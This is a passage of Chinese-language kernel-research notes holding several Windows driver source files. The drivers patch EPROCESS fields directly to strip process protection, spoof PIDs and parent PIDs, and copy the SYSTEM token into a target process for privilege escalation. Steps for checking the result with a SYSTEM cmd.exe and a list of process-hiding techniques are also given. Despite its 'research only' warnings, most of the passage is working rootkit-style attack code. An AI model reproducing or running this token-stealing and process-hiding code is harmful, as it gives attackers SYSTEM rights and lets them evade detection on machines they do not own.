        DebugMessage("qi:Original Protection Value: 0x%X", oldValue);

        // 修改值
        // 注意: 这里可能需要临时禁用内存写保护
        // 不建议在实际环境中使用此方法
        *(PUCHAR)(processBase + EPROCESS_PROTECTION_OFFSET) = NewProtectionValue;

        // 验证修改
        UCHAR newValue = *(PUCHAR)(processBase + EPROCESS_PROTECTION_OFFSET);
        DebugMessage("qi:New Protection Value: 0x%X", newValue);

        return STATUS_SUCCESS;
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        DebugMessage("qi:Exception occurred while modifying process protection: 0x%X", GetExceptionCode());
        return STATUS_UNSUCCESSFUL;
    }
}

// !!危险!! 尝试修改进程ID - 仅供研究，不要在实际系统上运行
// 这很可能导致系统崩溃
NTSTATUS ModifyProcessId(PEPROCESS Process, HANDLE NewPid)
{
    PUCHAR processBase = (PUCHAR)Process;

    __try {
        // 记录原始PID
        HANDLE oldPid = *(PHANDLE)(processBase + EPROCESS_PID_OFFSET);
        DebugMessage("qi:Original PID: %d (0x%X)", HandleToULong(oldPid), HandleToULong(oldPid));

        // 警告信息
        DebugMessage("qi:WARNING: Attempting to modify PID - THIS IS EXTREMELY DANGEROUS!");
        DebugMessage("qi:WARNING: System instability and crashes are highly likely!");

        // 修改PID - 严重警告：此操作极其危险！
        // 内核通常会阻止这种修改，或者修改后会导致系统不稳定
        *(PHANDLE)(processBase + EPROCESS_PID_OFFSET) = NewPid;

        // 验证修改 - 假设系统尚未崩溃
        HANDLE verifyPid = *(PHANDLE)(processBase + EPROCESS_PID_OFFSET);
        DebugMessage("qi:Attempted New PID: %d (0x%X)", HandleToULong(verifyPid), HandleToULong(verifyPid));

        // 注意：以上操作几乎肯定会导致系统不稳定！

        return STATUS_SUCCESS;
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        DebugMessage("qi:Exception occurred while modifying PID: 0x%X", GetExceptionCode());
        return STATUS_UNSUCCESSFUL;
    }
}

// 尝试修改名为"Notepad.exe"的进程的某些属性
VOID TryModifyProcess()
{
    // 查找PID为PID_OLD的进程
    PEPROCESS processObject;
    NTSTATUS status;

    status = PsLookupProcessByProcessId((HANDLE)PID_OLD, &processObject);
    if (!NT_SUCCESS(status))
    {
        DebugMessage("qi:Failed to find process with PID PID_OLD, status: 0x%X", status);
        return;
    }

    // 打印初始信息
    DebugMessage("qi:Found process with PID PID_OLD:");
    PrintProcessInfo(processObject);

    // 尝试修改较安全的属性
    DebugMessage("qi:Attempting to modify process protection...");
    ModifyProcessProtection(processObject, 0x00); // 尝试清除保护标志

    // 再次打印信息
    DebugMessage("qi:Process info after modification attempt:");
    PrintProcessInfo(processObject);

    // 危险操作：通常不会成功，且会导致系统不稳定
//#ifdef EXTREMELY_DANGEROUS_OPERATIONS
    DebugMessage("qi:Attempting to modify PID (EXTREMELY DANGEROUS)...");
    ModifyProcessId(processObject, (HANDLE)PID_NEW); // 尝试将PID从PID_OLD改为PID_NEW
    //#endif

        // 释放进程对象引用
    ObDereferenceObject(processObject);
}

// 驱动入口函数
NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegistryPath)
{
    DebugMessage("qi:Driver Entry!");
    pDriverObject->DriverUnload = UnloadDriver;

    // 严重警告
    DebugMessage("qi:WARNING: This driver attempts to modify internal Windows structures");
    DebugMessage("qi:WARNING: FOR RESEARCH PURPOSES ONLY - Do not run on production systems");

    // 尝试修改Registry进程属性
    TryModifyProcess();

    return STATUS_SUCCESS;
}

3.修改进程id与父进程id为固定值

#include <ntifs.h>
#include <ntstrsafe.h>

#pragma warning (disable : 4100)
#define DebugMessage(x, ...) DbgPrintEx(0, 0, x, __VA_ARGS__);

// EPROCESS结构体偏移量定义
#define EPROCESS_PID_OFFSET           0x440  // UniqueProcessId字段偏移量
#define EPROCESS_IMAGE_NAME_OFFSET    0x5a8  // ImageFileName字段偏移量
#define EPROCESS_PROTECTION_OFFSET    0x87A  // Protection字段偏移量 - 用于进程保护设置
#define EPROCESS_FLAGS_OFFSET         0x440  // Flags字段偏移量 - 具体偏移需要确认
// 需要添加父进程ID的偏移量定义
#define EPROCESS_PARENT_PID_OFFSET    0x540  // InheritedFromUniqueProcessId偏移量（示例值，实际需确认）
#define PID_OLD 0x7BC
#define PID_NEW 0x1399
#define PPID_NEW 0x1999

// 驱动卸载函数
NTSTATUS UnloadDriver(PDRIVER_OBJECT pDriverObject)
{
    DebugMessage("qi:Unload Driver!");
    return STATUS_SUCCESS;
}

// 打印进程的关键信息
VOID PrintProcessInfo(PEPROCESS Process)
{
    PUCHAR processBase = (PUCHAR)Process;

    // 获取进程ID
    HANDLE processId = *(PHANDLE)(processBase + EPROCESS_PID_OFFSET);
    DebugMessage("qi:Process ID: %d (0x%X)", HandleToULong(processId), HandleToULong(processId));

    // 获取进程名称
    UCHAR imageName[16] = { 0 };
    RtlCopyMemory(imageName, processBase + EPROCESS_IMAGE_NAME_OFFSET, 15);
    DebugMessage("qi:Process Name: %s", imageName);
}

// 尝试修改进程的保护标志
NTSTATUS ModifyProcessProtection(PEPROCESS Process, UCHAR NewProtectionValue)
{
    PUCHAR processBase = (PUCHAR)Process;

    __try {
        // 记录原始值
        UCHAR oldValue = *(PUCHAR)(processBase + EPROCESS_PROTECTION_OFFSET);
        DebugMessage("qi:Original Protection Value: 0x%X", oldValue);

        // 修改值
        // 注意: 这里可能需要临时禁用内存写保护
        // 不建议在实际环境中使用此方法
        *(PUCHAR)(processBase + EPROCESS_PROTECTION_OFFSET) = NewProtectionValue;

        // 验证修改
        UCHAR newValue = *(PUCHAR)(processBase + EPROCESS_PROTECTION_OFFSET);
        DebugMessage("qi:New Protection Value: 0x%X", newValue);

        return STATUS_SUCCESS;
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        DebugMessage("qi:Exception occurred while modifying process protection: 0x%X", GetExceptionCode());
        return STATUS_UNSUCCESSFUL;
    }
}

// !!危险!! 尝试修改进程ID - 仅供研究，不要在实际系统上运行
// 这很可能导致系统崩溃
NTSTATUS ModifyProcessId(PEPROCESS Process, HANDLE NewPid)
{
    PUCHAR processBase = (PUCHAR)Process;

    __try {
        // 记录原始PID
        HANDLE oldPid = *(PHANDLE)(processBase + EPROCESS_PID_OFFSET);
        DebugMessage("qi:Original PID: %d (0x%X)", HandleToULong(oldPid), HandleToULong(oldPid));

        // 警告信息
        DebugMessage("qi:WARNING: Attempting to modify PID - THIS IS EXTREMELY DANGEROUS!");
        DebugMessage("qi:WARNING: System instability and crashes are highly likely!");

        // 修改PID - 严重警告：此操作极其危险！
        // 内核通常会阻止这种修改，或者修改后会导致系统不稳定
        *(PHANDLE)(processBase + EPROCESS_PID_OFFSET) = NewPid;

        // 验证修改 - 假设系统尚未崩溃
        HANDLE verifyPid = *(PHANDLE)(processBase + EPROCESS_PID_OFFSET);
        DebugMessage("qi:Attempted New PID: %d (0x%X)", HandleToULong(verifyPid), HandleToULong(verifyPid));

        // 注意：以上操作几乎肯定会导致系统不稳定！

        return STATUS_SUCCESS;
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        DebugMessage("qi:Exception occurred while modifying PID: 0x%X", GetExceptionCode());
        return STATUS_UNSUCCESSFUL;
    }
}

// 修改父进程ID的函数
NTSTATUS ModifyParentProcessId(PEPROCESS Process, HANDLE NewParentPid)
{
    PUCHAR processBase = (PUCHAR)Process;

    __try {
        // 记录原始父PID
        HANDLE oldParentPid = *(PHANDLE)(processBase + EPROCESS_PARENT_PID_OFFSET);
        DebugMessage("qi:Original Parent PID: %d (0x%X)",
            HandleToULong(oldParentPid), HandleToULong(oldParentPid));

        // 修改父PID
        *(PHANDLE)(processBase + EPROCESS_PARENT_PID_OFFSET) = NewParentPid;

        // 验证修改
        HANDLE verifyParentPid = *(PHANDLE)(processBase + EPROCESS_PARENT_PID_OFFSET);
        DebugMessage("qi:New Parent PID: %d (0x%X)",
            HandleToULong(verifyParentPid), HandleToULong(verifyParentPid));

        return STATUS_SUCCESS;
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        DebugMessage("qi:Exception occurred while modifying Parent PID: 0x%X", GetExceptionCode());
        return STATUS_UNSUCCESSFUL;
    }
}
// 尝试修改名为"Notepad.exe"的进程的某些属性
VOID TryModifyProcess()
{
    // 查找PID进程
    PEPROCESS processObject;
    NTSTATUS status;

    status = PsLookupProcessByProcessId((HANDLE)PID_OLD, &processObject);
    if (!NT_SUCCESS(status))
    {
        DebugMessage("qi:Failed to find process with PID 0x%X, status: 0x%X", PID_OLD,status);
        return;
    }

    // 打印初始信息
    DebugMessage("qi:Found process with PID 0x%X:", PID_OLD);
    PrintProcessInfo(processObject);

    // 尝试修改较安全的属性
    DebugMessage("qi:Attempting to modify process protection...");
    ModifyProcessProtection(processObject, 0x00); // 尝试清除保护标志

    // 再次打印信息
    DebugMessage("qi:Process info after modification attempt:");
    PrintProcessInfo(processObject);

    // 危险操作：通常不会成功，且会导致系统不稳定
//#ifdef EXTREMELY_DANGEROUS_OPERATIONS
    DebugMessage("qi:Attempting to modify PID (EXTREMELY DANGEROUS)...");
    ModifyParentProcessId(processObject, (HANDLE)PPID_NEW);// 尝试修改ParentPID
    ModifyProcessId(processObject, (HANDLE)PID_NEW); // 尝试将修改PID

//#endif

    // 释放进程对象引用
    ObDereferenceObject(processObject);
}

// 驱动入口函数
NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegistryPath)
{
    DebugMessage("qi:Driver Entry!");
    pDriverObject->DriverUnload = UnloadDriver;

    // 严重警告
    DebugMessage("qi:WARNING: This driver attempts to modify internal Windows structures");
    DebugMessage("qi:WARNING: FOR RESEARCH PURPOSES ONLY - Do not run on production systems");

    // 尝试修改Registry进程属性
    TryModifyProcess();

    return STATUS_SUCCESS;
}

4.隐藏进程id

给pid赋值为0或者NULL

```

## 5.抹除进程多个信息？

1. 进程名
2. 路径
3. ppid
4. 断链
5. pid
6. 句柄
7. OwnerProcessId

# 复制system进程Token给其他进程用于提升进程权限

## 1.复制system进程Token给其他进程

1. 编写用户层代码，用来测试是否提权，可以创建新的cmd.exe查看。

   ```c

2. 运行

3. 记下pid

4. 编写驱动代码

#include <ntifs.h>
#include <ntstrsafe.h>

#pragma warning (disable : 4100)
#define DebugMessage(x, ...) DbgPrintEx(0, 0, x, __VA_ARGS__);

// EPROCESS结构体偏移量定义
#define EPROCESS_PID_OFFSET           0x440  // UniqueProcessId字段偏移量
#define EPROCESS_TOKEN_OFFSET         0x4b8  // Token字段偏移量
#define EPROCESS_IMAGE_NAME_OFFSET    0x5a8  // ImageFileName字段偏移量
#define PID 8960
// 驱动卸载函数
NTSTATUS UnloadDriver(PDRIVER_OBJECT pDriverObject)
{
    DebugMessage("qi:Unload Driver!");
    return STATUS_SUCCESS;
}

// 打印进程的关键信息
VOID PrintProcessInfo(PEPROCESS Process)
{
    PUCHAR processBase = (PUCHAR)Process;

    // 获取进程ID
    HANDLE processId = *(PHANDLE)(processBase + EPROCESS_PID_OFFSET);
    DebugMessage("qi:Process ID: %d (0x%X)", HandleToULong(processId), HandleToULong(processId));

    // 获取进程名称
    UCHAR imageName[16] = { 0 };
    RtlCopyMemory(imageName, processBase + EPROCESS_IMAGE_NAME_OFFSET, 15);
    DebugMessage("qi:Process Name: %s", imageName);

    // 获取Token地址
    ULONG_PTR tokenPtr = *(PULONG_PTR)(processBase + EPROCESS_TOKEN_OFFSET);
    DebugMessage("qi:Process Token: 0x%llX", tokenPtr);
}

// 复制一个进程的Token到另一个进程
NTSTATUS CopyProcessToken(PEPROCESS SourceProcess, PEPROCESS TargetProcess)
{
    PUCHAR sourceBase = (PUCHAR)SourceProcess;
    PUCHAR targetBase = (PUCHAR)TargetProcess;

    __try {
        // 获取源进程的Token
        ULONG_PTR sourceToken = *(PULONG_PTR)(sourceBase + EPROCESS_TOKEN_OFFSET);
        DebugMessage("qi:Source Process Token: 0x%llX", sourceToken);

        // 获取目标进程原始Token
        ULONG_PTR originalTargetToken = *(PULONG_PTR)(targetBase + EPROCESS_TOKEN_OFFSET);
        DebugMessage("qi:Original Target Process Token: 0x%llX", originalTargetToken);

        // 复制Token - 警告：这是一个高风险操作！
        DebugMessage("qi:WARNING: Attempting to copy process token - THIS IS A HIGH RISK OPERATION!");
        *(PULONG_PTR)(targetBase + EPROCESS_TOKEN_OFFSET) = sourceToken;

        // 验证修改
        ULONG_PTR newTargetToken = *(PULONG_PTR)(targetBase + EPROCESS_TOKEN_OFFSET);
        DebugMessage("qi:New Target Process Token: 0x%llX", newTargetToken);

        if (sourceToken == newTargetToken) {
            DebugMessage("qi:Token successfully copied!");
        }
        else {
            DebugMessage("qi:Token copy failed!");
        }

        return STATUS_SUCCESS;
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        DebugMessage("qi:Exception occurred while copying token: 0x%X", GetExceptionCode());
        return STATUS_UNSUCCESSFUL;
    }
}

// 尝试复制System进程的Token到目标进程
VOID TryTokenElevation()
{
    PEPROCESS systemProcess = NULL;
    PEPROCESS targetProcess = NULL;
    NTSTATUS status;

    // 查找PID为4的System进程
    status = PsLookupProcessByProcessId((HANDLE)4, &systemProcess);
    if (!NT_SUCCESS(status))
    {
        DebugMessage("qi:Failed to find System process (PID 4), status: 0x%X", status);
        return;
    }

    // 根据PID查找目标进程
    status = PsLookupProcessByProcessId((HANDLE)PID, &targetProcess);
    if (!NT_SUCCESS(status))
    {
        DebugMessage("qi:Failed to find target process with PID 0x%X, status: 0x%X",PID,status);
        ObDereferenceObject(systemProcess);
        return;
    }

    // 打印初始信息
    DebugMessage("qi:System process info:");
    PrintProcessInfo(systemProcess);

    DebugMessage("qi:Target process info:");
    PrintProcessInfo(targetProcess);

    // 尝试复制Token
    DebugMessage("qi:Attempting to copy System token to target process...");
    status = CopyProcessToken(systemProcess, targetProcess);

    if (NT_SUCCESS(status)) {
        DebugMessage("qi:Token copy operation completed. Target process info after modification:");
        PrintProcessInfo(targetProcess);
    }
    else {
        DebugMessage("qi:Token copy operation failed with status: 0x%X", status);
    }

    // 释放进程对象引用
    ObDereferenceObject(systemProcess);
    ObDereferenceObject(targetProcess);
}

// 驱动入口函数
NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegistryPath)
{
    DebugMessage("qi:Driver Entry!");
    pDriverObject->DriverUnload = UnloadDriver;

    // 严重警告
    DebugMessage("qi:WARNING: This driver attempts to copy process tokens");
    DebugMessage("qi:WARNING: FOR RESEARCH PURPOSES ONLY - Do not run on production systems");
    DebugMessage("qi:WARNING: This will likely trigger security alerts and may crash the system");

    // 尝试提升进程权限
    TryTokenElevation();

    return STATUS_SUCCESS;
}

5. 加载驱动
6. 在用户层应用程序创建新的cmd.exe进程
7. 在cmd.exe中查看是否属于系统权限。
8. 分别以普通用户与管理员模式运行。或者提权后注入dll,dll功能为创建新的进程cmd.exe.

2.复制system进程Token给其他进程，并且修改进程id为4

#include <ntifs.h>
#include <ntstrsafe.h>

#pragma warning (disable : 4100)
#define DebugMessage(x, ...) DbgPrintEx(0, 0, x, __VA_ARGS__);

// EPROCESS结构体偏移量定义
#define EPROCESS_PID_OFFSET           0x440  // UniqueProcessId字段偏移量
#define EPROCESS_TOKEN_OFFSET         0x4b8  // Token字段偏移量
#define EPROCESS_IMAGE_NAME_OFFSET    0x5a8  // ImageFileName字段偏移量
#define PID 7536  // 目标进程PID
// 驱动卸载函数
NTSTATUS UnloadDriver(PDRIVER_OBJECT pDriverObject)
{
    DebugMessage("qi:Unload Driver!");
    return STATUS_SUCCESS;
}

// 打印进程的关键信息
VOID PrintProcessInfo(PEPROCESS Process)
{
    PUCHAR processBase = (PUCHAR)Process;

    // 获取进程ID
    HANDLE processId = *(PHANDLE)(processBase + EPROCESS_PID_OFFSET);
    DebugMessage("qi:Process ID: %d (0x%X)", HandleToULong(processId), HandleToULong(processId));

    // 获取进程名称
    UCHAR imageName[16] = { 0 };
    RtlCopyMemory(imageName, processBase + EPROCESS_IMAGE_NAME_OFFSET, 15);
    DebugMessage("qi:Process Name: %s", imageName);

    // 获取Token地址
    ULONG_PTR tokenPtr = *(PULONG_PTR)(processBase + EPROCESS_TOKEN_OFFSET);
    DebugMessage("qi:Process Token: 0x%llX", tokenPtr);
}

// 复制一个进程的Token到另一个进程
NTSTATUS CopyProcessToken(PEPROCESS SourceProcess, PEPROCESS TargetProcess)
{
    PUCHAR sourceBase = (PUCHAR)SourceProcess;
    PUCHAR targetBase = (PUCHAR)TargetProcess;

    __try {
        // 获取源进程的Token
        ULONG_PTR sourceToken = *(PULONG_PTR)(sourceBase + EPROCESS_TOKEN_OFFSET);
        DebugMessage("qi:Source Process Token: 0x%llX", sourceToken);

        // 获取目标进程原始Token
        ULONG_PTR originalTargetToken = *(PULONG_PTR)(targetBase + EPROCESS_TOKEN_OFFSET);
        DebugMessage("qi:Original Target Process Token: 0x%llX", originalTargetToken);

        // 复制Token - 警告：这是一个高风险操作！
        DebugMessage("qi:WARNING: Attempting to copy process token - THIS IS A HIGH RISK OPERATION!");
        *(PULONG_PTR)(targetBase + EPROCESS_TOKEN_OFFSET) = sourceToken;

        // 验证修改
        ULONG_PTR newTargetToken = *(PULONG_PTR)(targetBase + EPROCESS_TOKEN_OFFSET);
        DebugMessage("qi:New Target Process Token: 0x%llX", newTargetToken);

        if (sourceToken == newTargetToken) {
            DebugMessage("qi:Token successfully copied!");
        }
        else {
            DebugMessage("qi:Token copy failed!");
        }

        return STATUS_SUCCESS;
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        DebugMessage("qi:Exception occurred while copying token: 0x%X", GetExceptionCode());
        return STATUS_UNSUCCESSFUL;
    }
}

// 尝试修改进程ID - 极其危险的操作，几乎肯定会导致系统崩溃
NTSTATUS ModifyProcessId(PEPROCESS Process, HANDLE NewPid)
{
    PUCHAR processBase = (PUCHAR)Process;

    __try {
        // 记录原始PID
        HANDLE oldPid = *(PHANDLE)(processBase + EPROCESS_PID_OFFSET);
        DebugMessage("qi:Original PID: %d (0x%X)", HandleToULong(oldPid), HandleToULong(oldPid));

        // 严重警告
        DebugMessage("qi:EXTREME DANGER: Attempting to modify PID to 4 (System)");
        DebugMessage("qi:EXTREME DANGER: This will cause immediate system instability");
        DebugMessage("qi:EXTREME DANGER: System crash is virtually guaranteed");

        // 修改PID - 这是致命操作
        *(PHANDLE)(processBase + EPROCESS_PID_OFFSET) = NewPid;

        // 验证修改 - 系统可能在此之前已经崩溃
        HANDLE verifyPid = *(PHANDLE)(processBase + EPROCESS_PID_OFFSET);
        DebugMessage("qi:Attempted New PID: %d (0x%X)", HandleToULong(verifyPid), HandleToULong(verifyPid));

        return STATUS_SUCCESS;
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        DebugMessage("qi:Exception occurred while modifying PID: 0x%X", GetExceptionCode());
        return STATUS_UNSUCCESSFUL;
    }
}

// 尝试复制System进程的Token到目标进程，并修改目标进程ID为4
VOID TrySystemImpersonation()
{
    PEPROCESS systemProcess = NULL;
    PEPROCESS targetProcess = NULL;
    NTSTATUS status;

    // 查找PID为4的System进程
    status = PsLookupProcessByProcessId((HANDLE)4, &systemProcess);
    if (!NT_SUCCESS(status))
    {
        DebugMessage("qi:Failed to find System process (PID 4), status: 0x%X", status);
        return;
    }

    // 依据查找PID目标进程
    status = PsLookupProcessByProcessId((HANDLE)PID, &targetProcess);
    if (!NT_SUCCESS(status))
    {
        DebugMessage("qi:Failed to find target process with PID 0x%X, status: 0x%X",PID, status);
        ObDereferenceObject(systemProcess);
        return;
    }

    // 打印初始信息
    DebugMessage("qi:System process info:");
    PrintProcessInfo(systemProcess);

    DebugMessage("qi:Target process info:");
    PrintProcessInfo(targetProcess);

    // 步骤1: 尝试复制Token
    DebugMessage("qi:Step 1: Attempting to copy System token to target process...");
    status = CopyProcessToken(systemProcess, targetProcess);

    if (NT_SUCCESS(status)) {
        DebugMessage("qi:Token copy operation completed. Target process info after token modification:");
        PrintProcessInfo(targetProcess);

        // 步骤2: 尝试修改进程ID - 极其危险
        DebugMessage("qi:Step 2: Attempting to modify target process ID to 4 (System) - EXTREMELY DANGEROUS");
        DebugMessage("qi:This will likely cause an immediate system crash");

        status = ModifyProcessId(targetProcess, (HANDLE)4);

        if (NT_SUCCESS(status)) {
            DebugMessage("qi:Process ID modification attempt completed - If you're seeing this message, it's surprising");
            PrintProcessInfo(targetProcess);
        }
        else {
            DebugMessage("qi:Process ID modification failed with status: 0x%X", status);
        }
    }
    else {
        DebugMessage("qi:Token copy operation failed with status: 0x%X", status);
    }

    // 释放进程对象引用
    ObDereferenceObject(systemProcess);
    ObDereferenceObject(targetProcess);
}

// 驱动入口函数
NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegistryPath)
{
    DebugMessage("qi:Driver Entry!");
    pDriverObject->DriverUnload = UnloadDriver;

    // 极端警告
    DebugMessage("qi:EXTREME DANGER: This driver attempts to copy System token AND modify process ID");
    DebugMessage("qi:EXTREME DANGER: THIS WILL CRASH YOUR SYSTEM");
    DebugMessage("qi:EXTREME DANGER: FOR RESEARCH PURPOSES ONLY - Do not run on any system you care about");

    // 尝试提升进程权限并修改PID
    TrySystemImpersonation();

    return STATUS_SUCCESS;
}

3.复制进程Token给其他进程，并且修改进程id

#include <ntifs.h>
#include <ntstrsafe.h>

#pragma warning (disable : 4100)
#define DebugMessage(x, ...) DbgPrintEx(0, 0, x, __VA_ARGS__);

// EPROCESS结构体偏移量定义
#define EPROCESS_PID_OFFSET           0x440  // UniqueProcessId字段偏移量
#define EPROCESS_TOKEN_OFFSET         0x4b8  // Token字段偏移量
#define EPROCESS_IMAGE_NAME_OFFSET    0x5a8  // ImageFileName字段偏移量
#define PID_OLD 4768  // 目标进程PID
#define PID_NEW 10072  // 新PID
// 驱动卸载函数
NTSTATUS UnloadDriver(PDRIVER_OBJECT pDriverObject)
{
    DebugMessage("qi:Unload Driver!");
    return STATUS_SUCCESS;
}

// 打印进程的关键信息
VOID PrintProcessInfo(PEPROCESS Process)
{
    PUCHAR processBase = (PUCHAR)Process;

    // 获取进程ID
    HANDLE processId = *(PHANDLE)(processBase + EPROCESS_PID_OFFSET);
    DebugMessage("qi:Process ID: %d (0x%X)", HandleToULong(processId), HandleToULong(processId));

    // 获取进程名称
    UCHAR imageName[16] = { 0 };
    RtlCopyMemory(imageName, processBase + EPROCESS_IMAGE_NAME_OFFSET, 15);
    DebugMessage("qi:Process Name: %s", imageName);

    // 获取Token地址
    ULONG_PTR tokenPtr = *(PULONG_PTR)(processBase + EPROCESS_TOKEN_OFFSET);
    DebugMessage("qi:Process Token: 0x%llX", tokenPtr);
}

// 复制一个进程的Token到另一个进程
NTSTATUS CopyProcessToken(PEPROCESS SourceProcess, PEPROCESS TargetProcess)
{
    PUCHAR sourceBase = (PUCHAR)SourceProcess;
    PUCHAR targetBase = (PUCHAR)TargetProcess;

    __try {
        // 获取源进程的Token
        ULONG_PTR sourceToken = *(PULONG_PTR)(sourceBase + EPROCESS_TOKEN_OFFSET);
        DebugMessage("qi:Source Process Token: 0x%llX", sourceToken);

        // 获取目标进程原始Token
        ULONG_PTR originalTargetToken = *(PULONG_PTR)(targetBase + EPROCESS_TOKEN_OFFSET);
        DebugMessage("qi:Original Target Process Token: 0x%llX", originalTargetToken);

        // 复制Token - 警告：这是一个高风险操作！
        DebugMessage("qi:WARNING: Attempting to copy process token - THIS IS A HIGH RISK OPERATION!");
        *(PULONG_PTR)(targetBase + EPROCESS_TOKEN_OFFSET) = sourceToken;

        // 验证修改
        ULONG_PTR newTargetToken = *(PULONG_PTR)(targetBase + EPROCESS_TOKEN_OFFSET);
        DebugMessage("qi:New Target Process Token: 0x%llX", newTargetToken);

        if (sourceToken == newTargetToken) {
            DebugMessage("qi:Token successfully copied!");
        }
        else {
            DebugMessage("qi:Token copy failed!");
        }

        return STATUS_SUCCESS;
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        DebugMessage("qi:Exception occurred while copying token: 0x%X", GetExceptionCode());
        return STATUS_UNSUCCESSFUL;
    }
}

// 尝试修改进程ID - 极其危险的操作，几乎肯定会导致系统崩溃
NTSTATUS ModifyProcessId(PEPROCESS Process, HANDLE NewPid)
{
    PUCHAR processBase = (PUCHAR)Process;

    __try {
        // 记录原始PID
        HANDLE oldPid = *(PHANDLE)(processBase + EPROCESS_PID_OFFSET);
        DebugMessage("qi:Original PID: %d (0x%X)", HandleToULong(oldPid), HandleToULong(oldPid));

        // 严重警告
        DebugMessage("qi:EXTREME DANGER: Attempting to modify PID to %d(PID_NEW)", PID_NEW);
        DebugMessage("qi:EXTREME DANGER: This will cause immediate system instability");
        DebugMessage("qi:EXTREME DANGER: System crash is virtually guaranteed");

        // 修改PID - 这是致命操作
        *(PHANDLE)(processBase + EPROCESS_PID_OFFSET) = NewPid;

        // 验证修改 - 系统可能在此之前已经崩溃
        HANDLE verifyPid = *(PHANDLE)(processBase + EPROCESS_PID_OFFSET);
        DebugMessage("qi:Attempted New PID: %d (0x%X)", HandleToULong(verifyPid), HandleToULong(verifyPid));

        return STATUS_SUCCESS;
    }
    __except (EXCEPTION_EXECUTE_HANDLER) {
        DebugMessage("qi:Exception occurred while modifying PID: 0x%X", GetExceptionCode());
        return STATUS_UNSUCCESSFUL;
    }
}

// 尝试复制System进程的Token到目标进程，并修改目标进程ID为PID_NEW
VOID TrySystemImpersonation()
{
    PEPROCESS systemProcess = NULL;
    PEPROCESS targetProcess = NULL;
    NTSTATUS status;

    // 查找PID为PID_NEW的进程
    status = PsLookupProcessByProcessId((HANDLE)PID_NEW, &systemProcess);
    if (!NT_SUCCESS(status))
    {
        DebugMessage("qi:Failed to find NEW process (PID %d), status: 0x%X", PID_NEW, status);
        return;
    }

    // 依据查找PID目标进程
    status = PsLookupProcessByProcessId((HANDLE)PID_OLD, &targetProcess);
    if (!NT_SUCCESS(status))
    {
        DebugMessage("qi:Failed to find target process with PID 0x%X, status: 0x%X", PID_OLD, status);
        ObDereferenceObject(systemProcess);
        return;
    }

    // 打印初始信息
    DebugMessage("qi:System process info:");
    PrintProcessInfo(systemProcess);

    DebugMessage("qi:Target process info:");
    PrintProcessInfo(targetProcess);

    // 步骤1: 尝试复制Token
    DebugMessage("qi:Step 1: Attempting to copy System token to target process...");
    status = CopyProcessToken(systemProcess, targetProcess);

    if (NT_SUCCESS(status)) {
        DebugMessage("qi:Token copy operation completed. Target process info after token modification:");
        PrintProcessInfo(targetProcess);

        // 步骤2: 尝试修改进程ID - 极其危险
        DebugMessage("qi:Step 2: Attempting to modify target process ID to %d (PID_NEW) - EXTREMELY DANGEROUS", PID_NEW);
        DebugMessage("qi:This will likely cause an immediate system crash");

        status = ModifyProcessId(targetProcess, (HANDLE)PID_NEW);

        if (NT_SUCCESS(status)) {
            DebugMessage("qi:Process ID modification attempt completed - If you're seeing this message, it's surprising");
            PrintProcessInfo(targetProcess);
        }
        else {
            DebugMessage("qi:Process ID modification failed with status: 0x%X", status);
        }
    }
    else {
        DebugMessage("qi:Token copy operation failed with status: 0x%X", status);
    }

    // 释放进程对象引用
    ObDereferenceObject(systemProcess);
    ObDereferenceObject(targetProcess);
}

// 驱动入口函数
NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegistryPath)
{
    DebugMessage("qi:Driver Entry!");
    pDriverObject->DriverUnload = UnloadDriver;

    // 尝试提升进程权限并修改PID
    TrySystemImpersonation();

    return STATUS_SUCCESS;
}

4.复制进程Token给其他进程，并且修改进程id与进程名（有用）

#include <ntifs.h>
#include <ntstrsafe.h>

#pragma warning (disable : 4100)
#define DebugMessage(x, ...) DbgPrintEx(0, 0, x, __VA_ARGS__);

// EPROCESS结构体偏移量定义
#define EPROCESS_PID_OFFSET           0x440  // UniqueProcessId字段偏移量
#define EPROCESS_TOKEN_OFFSET         0x4b8  // Token字段偏移量
#define EPROCESS_IMAGE_NAME_OFFSET    0x5a8  // ImageFileName字段偏移量
#define PID_OLD 8316  // 目标进程PID
#define PID_NEW 10128  // 新PID
// 驱动卸载函数
NTSTATUS UnloadDriver(PDRIVER_OBJECT pDriverObject)
{
    DebugMessage("qi:Unload Driver!");
    return STATUS_SUCCESS;
}

// 打印进程的关键信息
VOID PrintProcessInfo(PEPROCESS Process)
{
    PUCHAR processBase = (PUCHAR)Process;

    // 获取进程ID
    HANDLE processId = *(PHANDLE)(processBase + EPROCESS_PID_OFFSET);
    DebugMessage("qi:Process ID: %d (0x%X)", HandleToULong(processId), HandleToULong(processId));

    // 获取进程名称
    UCHAR imageName[16] = { 0 };
    RtlCopyMemory(imageName, processBase + EPROCESS_IMAGE_NAME_OFFSET, 15);
    DebugMessage("qi:Process Name: %s", imageName);

    // 获取Token地址
    ULONG_PTR tokenPtr = *(PULONG_PTR)(processBase + EPROCESS_TOKEN_OFFSET);
    DebugMessage("qi:Process Token: 0x%llX", tokenPtr);
}

// 复制一个进程的Token到另一个进程
NTSTATUS CopyProcessToken(PEPROCESS SourceProcess, PEPROCESS TargetProcess)
{
    PUCHAR sourceBase = (PUCHAR)SourceProcess;
    PUCHAR targetBase = (PUCHAR)TargetProcess;

    __try {
        // 获取源进程的Token
        ULONG_PTR sourceToken = *(PULONG_PTR)(sourceBase + EPROCESS_TOKEN_OFFSET);
        DebugMessage("qi:Source Process Token: 0x%llX", sourceToken);

        // 获取目标进程原始Token
        ULONG_PTR originalTargetToken = *(PULONG_PTR)(targetBase + EPROCESS_TOKEN_OFFSET);
        DebugMessage("qi:Original Target Process Token: 0x%llX", originalTargetToken);

        // 复制Token - 警告：这是一个高风险操作！
        DebugMessage("qi:WARNING: Attempting to copy process token - THIS IS A HIGH RISK OPERATION!");
